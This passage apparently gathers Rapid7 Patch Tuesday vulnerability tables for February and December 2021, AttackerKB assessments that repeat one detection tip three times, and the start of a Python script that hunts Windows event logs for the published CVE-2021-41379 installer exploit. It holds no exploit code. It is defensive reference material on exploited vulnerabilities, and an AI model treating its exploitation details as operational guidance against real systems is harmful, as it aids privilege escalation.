[CVE-2021-24073](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24073>) | Skype for Business and Lync Spoofing Vulnerability | No | No | 6.5 | No
[CVE-2021-24099](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24099>) | Skype for Business and Lync Denial of Service Vulnerability | No | No | 6.5 | No
[CVE-2021-24114](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24114>) | Microsoft Teams iOS Information Disclosure Vulnerability | No | No | 5.7 | Yes
[CVE-2021-1726](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1726>) | Microsoft SharePoint Spoofing Vulnerability | No | No | 8 | Yes
[CVE-2021-24072](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24072>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | No
[CVE-2021-24066](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24066>) | Microsoft SharePoint Remote Code Execution Vulnerability | No | No | 8.8 | Yes
[CVE-2021-24071](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24071>) | Microsoft SharePoint Information Disclosure Vulnerability | No | No | 5.3 | Yes
[CVE-2021-24067](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24067>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes
[CVE-2021-24068](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24068>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes
[CVE-2021-24069](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24069>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes
[CVE-2021-24070](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24070>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes

#### System Center Vulnerabilities

CVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ?
---|---|---|---|---|---
[CVE-2021-1728](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1728>) | System Center Operations Manager Elevation of Privilege Vulnerability | No | No | 8.8 | Yes
[CVE-2021-24092](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24092>) | Microsoft Defender Elevation of Privilege Vulnerability | No | No | 7.8 | Yes

#### Windows Vulnerabilities

CVE | Vulnerability Title | Exploited | Publicly Disclosed | CVSSv3 Base Score | FAQ?
---|---|---|---|---|---
[CVE-2021-1732](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732>) | Windows Win32k Elevation of Privilege Vulnerability | Yes | No | 7.8 | No
[CVE-2021-1698](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1698>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-24075](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24075>) | Windows Network File System Denial of Service Vulnerability | No | No | 6.8 | No
[CVE-2021-24084](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24084>) | Windows Mobile Device Management Information Disclosure Vulnerability | No | No | 5.5 | Yes
[CVE-2021-24096](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24096>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-24093](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24093>) | Windows Graphics Component Remote Code Execution Vulnerability | No | No | 8.8 | Yes
[CVE-2021-24106](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24106>) | Windows DirectX Information Disclosure Vulnerability | No | Yes | 5.5 | Yes
[CVE-2021-24098](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24098>) | Windows Console Driver Denial of Service Vulnerability | No | Yes | 5.5 | Yes
[CVE-2021-24091](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24091>) | Windows Camera Codec Pack Remote Code Execution Vulnerability | No | No | 7.8 | No
[CVE-2021-24079](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24079>) | Windows Backup Engine Information Disclosure Vulnerability | No | No | 5.5 | Yes
[CVE-2021-1731](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1731>) | PFX Encryption Security Feature Bypass Vulnerability | No | No | 5.5 | Yes
[CVE-2021-24082](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24082>) | Microsoft.PowerShell.Utility Module WDAC Security Feature Bypass Vulnerability | No | No | 4.3 | No
[CVE-2021-24076](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24076>) | Microsoft Windows VMSwitch Information Disclosure Vulnerability | No | No | 5.5 | Yes
[CVE-2021-24081](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24081>) | Microsoft Windows Codecs Library Remote Code Execution Vulnerability | No | No | 7.8 | No

### Summary Charts

_Note: Chart data is reflective of data presented by Microsoft's CVRF at the time of writing._

---

Source: Rapid7 blog, "Patch Tuesday - February 2021", published 2021-02-09 (https://blog.rapid7.com/2021/02/09/patch-tuesday-february-2021/). Aggregator record RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F; aggregate CVSS v2 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C). CVEs referenced by the post: CVE-2020-1472, CVE-2021-1639, CVE-2021-1698, CVE-2021-1721, CVE-2021-1722, CVE-2021-1724, CVE-2021-1726, CVE-2021-1727, CVE-2021-1728, CVE-2021-1730, CVE-2021-1731, CVE-2021-1732, CVE-2021-1733, CVE-2021-1734, CVE-2021-21017, CVE-2021-21142, CVE-2021-21143, CVE-2021-21144, CVE-2021-21145, CVE-2021-21146, CVE-2021-21147, CVE-2021-21148, CVE-2021-24066, CVE-2021-24067, CVE-2021-24068, CVE-2021-24069, CVE-2021-24070, CVE-2021-24071, CVE-2021-24072, CVE-2021-24073, CVE-2021-24074, CVE-2021-24075, CVE-2021-24076, CVE-2021-24077, CVE-2021-24078, CVE-2021-24079, CVE-2021-24080, CVE-2021-24081, CVE-2021-24082, CVE-2021-24083, CVE-2021-24084, CVE-2021-24085, CVE-2021-24086, CVE-2021-24087, CVE-2021-24088, CVE-2021-24091, CVE-2021-24092, CVE-2021-24093, CVE-2021-24094, CVE-2021-24096, CVE-2021-24098, CVE-2021-24099, CVE-2021-24100, CVE-2021-24101, CVE-2021-24102, CVE-2021-24103, CVE-2021-24105, CVE-2021-24106, CVE-2021-24109, CVE-2021-24111, CVE-2021-24112, CVE-2021-24113, CVE-2021-24114, CVE-2021-25195, CVE-2021-26700, CVE-2021-26701.

---

# Patch Tuesday - December 2021

(Rapid7 blog; aggregator record last seen 2021-12-22.)

This month's Patch Tuesday comes in the middle of a global effort to mitigate [Apache Log4j CVE-2021-44228](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>). In today's security release, Microsoft issued fixes for 83 vulnerabilities across an array of products, including a fix for Windows Defender for IoT, which is [vulnerable to CVE-2021-44228](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-iot/updated-13-dec-microsoft-defender-for-iot-security-advisory/m-p/3036844>) amongst seven other remote code execution (RCE) vulnerabilities (the cloud service is not affected).
Six CVEs in the bulletin have been publicly disclosed; the only vulnerability noted as being exploited in the wild in this month's release is [CVE-2021-43890](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43890>), a Windows AppX Installer spoofing bug that may aid in social engineering attacks and has evidently been used in Emotet malware campaigns.

Interestingly, this round of fixes also includes [CVE-2021-43883](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43883>), a Windows Installer privilege escalation bug whose advisory is sparse despite the fact that it appears to affect all supported versions of Windows. While there's no indication in the advisory that the two vulnerabilities are related, CVE-2021-43883 looks an awful lot like the fix for [a zero-day vulnerability](<https://www.rapid7.com/blog/post/2021/11/30/ongoing-exploitation-of-windows-installer-cve-2021-41379/>) that made a splash in the security community last month after proof-of-concept exploit code was released and in-the-wild attacks began. The zero-day vulnerability, which researchers hypothesized was a patch bypass for CVE-2021-41379, allowed low-privileged attackers to overwrite protected files and escalate to SYSTEM. Rapid7's vulnerability research team did a full [root cause analysis](<https://attackerkb.com/topics/7LstI2clmF/cve-2021-41379/rapid7-analysis?referrer=ptblog>) of the bug as attacks ramped up in November.

As usual, RCE flaws figure prominently in the "Critical"-rated CVEs this month. In addition to Windows Defender for IoT, critical RCE bugs were fixed this month in Microsoft Office, Microsoft Devices, Internet Storage Name Service (iSNS), and the WSL extension for Visual Studio Code. Given the outsized risk presented by most vulnerable implementations of Log4Shell, administrators should prioritize patches for any products affected by CVE-2021-44228.
Past that, put critical server-side and OS RCE patches at the top of your list, and we'd advise sneaking in the fix for CVE-2021-43883 despite its lower severity rating.

## Summary charts

## Summary tables

### Apps Vulnerabilities

CVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ?
---|---|---|---|---|---
[CVE-2021-43890](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43890>) | Windows AppX Installer Spoofing Vulnerability | Yes | Yes | 7.1 | Yes
[CVE-2021-43905](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43905>) | Microsoft Office app Remote Code Execution Vulnerability | No | No | 9.6 | Yes

### Browser Vulnerabilities

CVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ?
---|---|---|---|---|---
[CVE-2021-4068](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4068>) | Chromium: CVE-2021-4068 Insufficient validation of untrusted input in new tab page | No | No | N/A | Yes
[CVE-2021-4067](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4067>) | Chromium: CVE-2021-4067 Use after free in window manager | No | No | N/A | Yes
[CVE-2021-4066](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4066>) | Chromium: CVE-2021-4066 Integer underflow in ANGLE | No | No | N/A | Yes
[CVE-2021-4065](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4065>) | Chromium: CVE-2021-4065 Use after free in autofill | No | No | N/A | Yes
[CVE-2021-4064](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4064>) | Chromium: CVE-2021-4064 Use after free in screen capture | No | No | N/A | Yes
[CVE-2021-4063](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4063>) | Chromium: CVE-2021-4063 Use after free in developer tools | No | No | N/A | Yes
[CVE-2021-4062](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4062>) | Chromium: CVE-2021-4062 Heap buffer overflow in BFCache | No | No | N/A | Yes
[CVE-2021-4061](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4061>) | Chromium: CVE-2021-4061 Type Confusion in V8 | No | No | N/A | Yes
[CVE-2021-4059](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4059>) | Chromium: CVE-2021-4059 Insufficient data validation in loader | No | No | N/A | Yes
[CVE-2021-4058](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4058>) | Chromium: CVE-2021-4058 Heap buffer overflow in ANGLE | No | No | N/A | Yes
[CVE-2021-4057](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4057>) | Chromium: CVE-2021-4057 Use after free in file API | No | No | N/A | Yes
[CVE-2021-4056](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4056>) | Chromium: CVE-2021-4056: Type Confusion in loader | No | No | N/A | Yes
[CVE-2021-4055](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4055>) | Chromium: CVE-2021-4055 Heap buffer overflow in extensions | No | No | N/A | Yes
[CVE-2021-4054](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4054>) | Chromium: CVE-2021-4054 Incorrect security UI in autofill | No | No | N/A | Yes
[CVE-2021-4053](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4053>) | Chromium: CVE-2021-4053 Use after free in UI | No | No | N/A | Yes
[CVE-2021-4052](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-4052>) | Chromium: CVE-2021-4052 Use after free in web apps | No | No | N/A | Yes

### Developer Tools Vulnerabilities

CVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ?
---|---|---|---|---|---
[CVE-2021-43907](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43907>) | Visual Studio Code WSL Extension Remote Code Execution Vulnerability | No | No | 9.8 | No
[CVE-2021-43908](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43908>) | Visual Studio Code Spoofing Vulnerability | No | No | N/A | No
[CVE-2021-43891](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43891>) | Visual Studio Code Remote Code Execution Vulnerability | No | No | 7.8 | No
[CVE-2021-43896](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43896>) | Microsoft PowerShell Spoofing Vulnerability | No | No | 5.5 | No
[CVE-2021-43892](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43892>) | Microsoft BizTalk ESB Toolkit Spoofing Vulnerability | No | No | 7.4 | No
[CVE-2021-43225](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43225>) | Bot Framework SDK Remote Code Execution Vulnerability | No | No | 7.5 | No
[CVE-2021-43877](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43877>) | ASP.NET Core and Visual Studio Elevation of Privilege Vulnerability | No | No | 7.8 | No

### Device Vulnerabilities

CVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ?
---|---|---|---|---|---
[CVE-2021-43899](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43899>) | Microsoft 4K Wireless Display Adapter Remote Code Execution Vulnerability | No | No | 9.8 | Yes

### Microsoft Office Vulnerabilities

CVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ?
---|---|---|---|---|---
[CVE-2021-42295](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42295>) | Visual Basic for Applications Information Disclosure Vulnerability | No | No | 5.5 | Yes
[CVE-2021-42320](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42320>) | Microsoft SharePoint Server Spoofing Vulnerability | No | No | 8 | Yes
[CVE-2021-43242](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43242>) | Microsoft SharePoint Server Spoofing Vulnerability | No | No | 7.6 | No
[CVE-2021-42309](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42309>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes
[CVE-2021-42294](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42294>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 7.2 | Yes
[CVE-2021-43255](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43255>) | Microsoft Office Trust Center Spoofing Vulnerability | No | No | 5.5 | Yes
[CVE-2021-43875](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43875>) | Microsoft Office Graphics Remote Code Execution Vulnerability | No | No | 7.8 | Yes
[CVE-2021-42293](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42293>) | Microsoft Jet Red Database Engine and Access Connectivity Engine Elevation of Privilege Vulnerability | No | No | 6.5 | Yes
[CVE-2021-43256](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43256>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes

### System Center Vulnerabilities

CVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ?
---|---|---|---|---|---
[CVE-2021-43882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43882>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 9 | Yes
[CVE-2021-42311](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42311>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 8.8 | Yes
[CVE-2021-42313](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42313>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 8.8 | Yes
[CVE-2021-42314](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42314>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 8.8 | Yes
[CVE-2021-42315](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42315>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 8.8 | Yes
[CVE-2021-41365](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41365>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 8.8 | Yes
[CVE-2021-42310](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42310>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 8.1 | Yes
[CVE-2021-43889](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43889>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 7.2 | Yes
[CVE-2021-43888](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43888>) | Microsoft Defender for IoT Information Disclosure Vulnerability | No | No | 7.5 | Yes
[CVE-2021-42312](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42312>) | Microsoft Defender for IOT Elevation of Privilege Vulnerability | No | No | 7.8 | Yes

### Windows Vulnerabilities

CVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ?
---|---|---|---|---|---
[CVE-2021-43247](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43247>) | Windows TCP/IP Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-43237](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43237>) | Windows Setup Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-43239](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43239>) | Windows Recovery Environment Agent Elevation of Privilege Vulnerability | No | No | 7.1 | No
[CVE-2021-43231](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43231>) | Windows NTFS Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-43880](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43880>) | Windows Mobile Device Management Elevation of Privilege Vulnerability | No | Yes | 5.5 | Yes
[CVE-2021-43244](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43244>) | Windows Kernel Information Disclosure Vulnerability | No | No | 6.5 | Yes
[CVE-2021-43246](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43246>) | Windows Hyper-V Denial of Service Vulnerability | No | No | 5.6 | No
[CVE-2021-43232](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43232>) | Windows Event Tracing Remote Code Execution Vulnerability | No | No | 7.8 | No
[CVE-2021-43248](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43248>) | Windows Digital Media Receiver Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-43214](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43214>) | Web Media Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes
[CVE-2021-43243](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43243>) | VP9 Video Extensions Information Disclosure Vulnerability | No | No | 5.5 | Yes
[CVE-2021-43228](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43228>) | SymCrypt Denial of Service Vulnerability | No | No | 7.5 | No
[CVE-2021-43227](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43227>) | Storage Spaces Controller Information Disclosure Vulnerability | No | No | 5.5 | Yes
[CVE-2021-43235](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43235>) | Storage Spaces Controller Information Disclosure Vulnerability | No | No | 5.5 | Yes
[CVE-2021-43240](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43240>) | NTFS Set Short Name Elevation of Privilege Vulnerability | No | Yes | 7.8 | No
[CVE-2021-40452](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40452>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes
[CVE-2021-40453](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40453>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes
[CVE-2021-41360](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41360>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes
[CVE-2021-43219](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43219>) | DirectX Graphics Kernel File Denial of Service Vulnerability | No | No | 7.4 | No

### Windows ESU Vulnerabilities

CVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ?
---|---|---|---|---|---
[CVE-2021-43215](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43215>) | iSNS Server Memory Corruption Vulnerability Can Lead to Remote Code Execution | No | No | 9.8 | Yes
[CVE-2021-43238](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43238>) | Windows Remote Access Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-43223](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43223>) | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-41333](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41333>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | Yes | 7.8 | No
[CVE-2021-43229](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43229>) | Windows NTFS Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-43230](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43230>) | Windows NTFS Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-40441](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40441>) | Windows Media Center Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-43883](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43883>) | Windows Installer Elevation of Privilege Vulnerability | No | Yes | 7.8 | No
[CVE-2021-43234](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43234>) | Windows Fax Service Remote Code Execution Vulnerability | No | No | 7.8 | No
[CVE-2021-43217](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43217>) | Windows Encrypting File System (EFS) Remote Code Execution Vulnerability | No | No | 8.1 | Yes
[CVE-2021-43893](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43893>) | Windows Encrypting File System (EFS) Elevation of Privilege Vulnerability | No | Yes | 7.5 | No
[CVE-2021-43245](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43245>) | Windows Digital TV Tuner Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-43224](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43224>) | Windows Common Log File System Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes
[CVE-2021-43226](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43226>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-43207](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43207>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-43233](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43233>) | Remote Desktop Client Remote Code Execution Vulnerability | No | No | 7.5 | No
[CVE-2021-43222](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43222>) | Microsoft Message Queuing Information Disclosure Vulnerability | No | No | 7.5 | Yes
[CVE-2021-43236](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43236>) | Microsoft Message Queuing Information Disclosure Vulnerability | No | No | 7.5 | Yes
[CVE-2021-43216](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43216>) | Microsoft Local Security Authority Server (lsasrv) Information Disclosure Vulnerability | No | No | 6.5 | Yes

---

Source: Rapid7 blog, "Patch Tuesday - December 2021", published 2021-12-14 (https://blog.rapid7.com/2021/12/14/patch-tuesday-december-2021/). Aggregator record RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44; aggregate CVSS v3.1 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) and CVSS v2 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C). CVEs referenced by the post: CVE-2021-40441, CVE-2021-40452, CVE-2021-40453, CVE-2021-4052, CVE-2021-4053, CVE-2021-4054, CVE-2021-4055, CVE-2021-4056, CVE-2021-4057, CVE-2021-4058, CVE-2021-4059, CVE-2021-4061, CVE-2021-4062, CVE-2021-4063, CVE-2021-4064, CVE-2021-4065, CVE-2021-4066, CVE-2021-4067, CVE-2021-4068, CVE-2021-41333, CVE-2021-41360, CVE-2021-41365, CVE-2021-41379, CVE-2021-42293, CVE-2021-42294, CVE-2021-42295, CVE-2021-42309, CVE-2021-42310, CVE-2021-42311, CVE-2021-42312, CVE-2021-42313, CVE-2021-42314, CVE-2021-42315, CVE-2021-42320, CVE-2021-43207, CVE-2021-43214, CVE-2021-43215, CVE-2021-43216, CVE-2021-43217, CVE-2021-43219, CVE-2021-43222, CVE-2021-43223, CVE-2021-43224, CVE-2021-43225, CVE-2021-43226, CVE-2021-43227, CVE-2021-43228, CVE-2021-43229, CVE-2021-43230, CVE-2021-43231, CVE-2021-43232, CVE-2021-43233, CVE-2021-43234, CVE-2021-43235, CVE-2021-43236, CVE-2021-43237, CVE-2021-43238, CVE-2021-43239, CVE-2021-43240, CVE-2021-43242, CVE-2021-43243, CVE-2021-43244, CVE-2021-43245, CVE-2021-43246, CVE-2021-43247, CVE-2021-43248, CVE-2021-43255, CVE-2021-43256, CVE-2021-43875, CVE-2021-43877, CVE-2021-43880, CVE-2021-43882, CVE-2021-43883, CVE-2021-43888, CVE-2021-43889, CVE-2021-43890, CVE-2021-43891, CVE-2021-43892, CVE-2021-43893, CVE-2021-43896, CVE-2021-43899, CVE-2021-43905, CVE-2021-43907, CVE-2021-43908, CVE-2021-44228.

---

# AttackerKB: Windows Installer Elevation of Privilege Vulnerability (CVE-2021-41379)

(Aggregator record last seen 2023-05-23.)

**Recent assessments:**

**NinjaOperator** at November 22, 2021 3:59pm UTC reported:

According to Florian Roth: "You can detect the exploitation of Windows InstallerFileTakeOver LPE CVE-2021-41379 with the published PoC with events from the 'Application' Eventlog.
Search for EventID 1033 and the keyword 'test pkg'."
<https://twitter.com/cyb3rops/status/1462711685484101634>

**jbaines-r7** at December 03, 2021 7:27pm UTC reported:

According to Florian Roth: "You can detect the exploitation of Windows InstallerFileTakeOver LPE CVE-2021-41379 with the published PoC with events from the 'Application' Eventlog.
Search for EventID 1033 and the keyword 'test pkg'."
<https://twitter.com/cyb3rops/status/1462711685484101634>

**gwillcox-r7** at November 24, 2021 9:16pm UTC reported:

According to Florian Roth: "You can detect the exploitation of Windows InstallerFileTakeOver LPE CVE-2021-41379 with the published PoC with events from the 'Application' Eventlog.
Search for EventID 1033 and the keyword 'test pkg'."
<https://twitter.com/cyb3rops/status/1462711685484101634>

Assessed Attacker Value: 4 (all three assessments)
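The detection tip quoted in the three assessments above (MsiInstaller event 1033 in the Application log, product name "test pkg") as a runnable check over an exported log. This is an added example written for this page, not code from AttackerKB, Rapid7, Florian Roth or the PoC author. It assumes the XML shape that `wevtutil qe Application /f:xml` emits (a bare sequence of `<Event>` elements, no root) and that the unnamed `<Data>` fields of event 1033 follow its message template order (Product Name, Product Version, Product Language, Manufacturer, status); the sample records are constructed.

```python
"""Hunt for the published InstallerFileTakeOver PoC (CVE-2021-41379) in an
Application-log export: MsiInstaller event 1033 ("Windows Installer installed
the product") whose product name is "test pkg".
Added example for this page, not code from AttackerKB, Rapid7 or the PoC author.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import Iterator, List

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
POC_PRODUCT_NAME = "test pkg"  # product name the published PoC MSI uses


@dataclass
class MsiInstall:
    time: str
    computer: str
    user_sid: str
    product: str
    version: str
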